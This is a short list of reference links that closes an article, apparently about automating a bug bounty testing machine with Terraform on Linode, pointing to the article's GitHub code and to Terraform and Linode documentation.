Here are some links to more information and documentation pertinent to this article, including a link to this code on GitHub.

https://www.github.com/pizza-power/bugbountyboxautomation

https://www.terraform.io/cli

https://www.linode.com/docs/guides/how-to-build-your-infrastructure-using-terraform-and-linode/

https://registry.terraform.io/providers/linode/linode/latest/docs